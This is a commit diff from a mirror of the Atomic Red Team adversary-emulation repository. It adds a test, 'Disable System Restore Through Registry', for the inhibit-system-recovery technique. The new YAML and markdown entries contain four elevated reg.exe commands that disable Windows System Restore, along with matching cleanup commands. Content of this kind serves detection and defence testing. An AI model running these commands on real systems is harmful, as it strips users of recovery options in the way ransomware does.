security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2022-03-17 16:25:32 +00:00
parent 6c5ba92a6b
commit f6bb04b95f
6 changed files with 65 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -780,6 +780,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
780 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
781 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
782 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
783 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
784 impact T1491.001 Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
785 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
786 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -533,6 +533,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
533 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
534 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
535 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
536 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
537 impact T1491.001 Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
538 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
539 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -1258,6 +1258,7 @@
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -898,6 +898,7 @@
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/index.yaml
+20
View File
@@ -53804,6 +53804,26 @@ impact:
'
name: command_prompt
elevation_required: true
- name: Disable System Restore Through Registry
auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f
description: "Modify the registry of the currently logged in user using reg.exe
via cmd console to disable system restore on the computer. \nSee how remcos
RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
cleanup_command: |
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
name: command_prompt
elevation_required: true
T1491.001:
technique:
external_references:
atomics/T1490/T1490.md
+41
View File
@@ -27,6 +27,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #8 - Windows - Disable the SR scheduled task](#atomic-test-8---windows---disable-the-sr-scheduled-task)
- [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry)
<br/>
@@ -285,4 +287,43 @@ schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
<br/>
<br/>
## Atomic Test #9 - Disable System Restore Through Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer.
See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 66e647d1-8741-4e43-b7c1-334760c2047f
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
```
<br/>